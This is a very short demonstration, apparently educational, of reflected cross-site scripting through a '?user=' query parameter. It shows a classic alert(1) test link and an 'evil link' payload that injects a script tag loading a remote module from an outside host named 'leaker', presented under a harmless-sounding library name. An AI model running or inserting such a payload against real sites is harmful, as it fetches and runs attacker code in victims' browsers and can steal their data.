Intended link format: ?user=SomeName
Classic alert(1) XSS: Click for a XSS
Evil link on another site (Click for a Prize!) runs this code:
document.body.appendChild(document.createElement("script")).type =
"module"; document.body.lastChild.src =
"https://leaker.njg4ne.workers.dev/useful-print-library.js";